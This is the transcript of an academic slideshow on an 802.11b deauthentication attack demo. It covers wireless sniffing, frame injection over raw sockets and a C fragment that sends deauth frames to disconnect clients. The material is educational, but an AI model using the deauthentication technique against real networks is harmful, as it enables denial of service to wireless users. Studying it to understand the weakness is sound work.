802 11 attack demo
Download
1 / 24

802.11 Attack Demo - PowerPoint PPT Presentation


  • 144 Views
  • Uploaded on

802.11 Attack Demo. Haobo Zhou ([email protected]) L I A C S http://www.liacs.nl/home/hzhou. What Will Be Covered. Overview of 802.11b Wireless network sniffer Frame Injection Deauth/Disassociation Attack Attack Demo. NO!! Thanks. OK !!. Dinner??. ISO OSI Model and 802.11b.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' 802.11 Attack Demo' - didier


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
802 11 attack demo

802.11 Attack Demo

Haobo Zhou

([email protected])

L I A C S

http://www.liacs.nl/home/hzhou


What will be covered
What Will Be Covered

  • Overview of 802.11b

  • Wireless network sniffer

  • Frame Injection

  • Deauth/Disassociation Attack

  • Attack Demo


NO!!

Thanks

OK

!!

Dinner??


Iso osi model and 802 11b
ISO OSI Model and 802.11b

Overview of 802.11b

Obtained From http://alpha.fdu.edu/~kanoksri/IEEE80211b.html


Overview of 802 11b
Overview of 802.11b

  • Runs over 2.4ghz

    • DSSS - Direct Sequence Spread Spectrum

    • Channels

      • FCC (US) - 11 Channels (1-11)

      • ETSI (EU) - 13 Channels (1-13)

      • France - 4 Channels (10-13)

      • Japan - 14 Channels (1-14)

    • Uses CSMA/CA


Overview of 802 11b1
Overview of 802.11b

  • Uses WEP for Encryption

    • “Wired Equivalent Privacy”

    • Uses RC4

    • 40-bit or 104-bit static key with 24-bit IV


Overview of 802 11b2
Overview of 802.11b

  • Consists of 3 main protocol types

    • Management

    • Control

    • Data



Overview of 802 11b4
Overview of 802.11b

Infrastructure


Overview of 802 11b5

Beacon

Authentication Req

Authentication Resp

Association Req

Association Resp

Overview of 802.11b

Node

Access Point

Access Point

Accepts Node

Node is Associated


Wireless network sniffer
Wireless network sniffer

wireless networking Detection

  • NIC with monitor mode support

    • why?

      • Management frame

      • Frames belongs to others

  • Tools

    • Kismet

    • others


Wireless network sniffer1
Wireless network sniffer

Networking Interface Card Mode

  • Managed (Infrastructure)

  • Ad-Hoc (AD Hoc )

  • Monitor ( Hardware support ??)

  • Master (acts as an AP)


Wireless network sniffer2
Wireless network sniffer

  • KISMET

    • An 802.11 layer2 wireless network sniffer

    • Working on Linux

    • Ethereal/Tcpdump compatable data logging

    • Over 20 supported card types

    • Open source code



Frame injection
Frame Injection

  • NIC

    • support ?

  • Device Driver

    • support frame injection?

      • Yes- very good

      • NO- Change it!

  • User program


Frame injection1
Frame Injection

  • User program

    • C code in linux

    • RAW socket programming

      • Use PF_PACKET interface to access the link layer

      • sd=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));


Deauthentication attack
Deauthentication Attack

  • Management frames can control link characteristics and physical medium properties

  • 802.11b management frames are NOT authenticated

    • Why is this bad?


Deauthentication attack1
Deauthentication Attack

  • Denial of Service – De-authentication

    • Use MAC address of Access Point

    • Send deauthenticate frames

      • Send continuously

    • Users are unable to reassociate with AP


Deauthentication attack2
Deauthentication Attack

STATE 1

Unauthenticated

Unassociated

STATE 2

Authenticated

Unassociated

Successful

authentication

Deauthentication

Disassociation

Deauthentication

Successful

Association

STATE 3

Authenticated

Associated


Deauthentication attack3

Deauthentication Attack

Deauth framestructure


Deauthentication attack4
Deauthentication Attack

  • void send_deauth (__u8 *dst, __u8 *bssid)

  • { struct {

  • struct a3_80211 hdr;

  • __u16 reason;

  • }mgt_frame;

  • memset(&mgt_frame, 0, sizeof(frame));

  • mgt_frame.hdr.mh_type = FC_TYPE_MGT;

  • mgt_frame.hdr.mh_subtype = MGT_DEAUTH;

  • memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6);

  • memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6);

  • memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6);

  • mgt_frame.reason = 2;

  • send(socket, &frame, sizeof(mgt_frame), 0);

  • }


Question ?

deauth-attack demo continues


802 11 deauth attack demo

Hardware

Laptop

Wireless card

Atheros 5212 chip

monitor mode support

software

Device Driver

Madwifi

open source project

Two patches to enable frame injection

User program

Fata_jace.c

Hardware

Laptop

Wireless card

Software

Ping

Use ping to make sure the connection

802.11 Deauth-attack DEMO

Attacker

Victim


Thanks

  • Xu Li

  • Wei Wang

  • Google


ad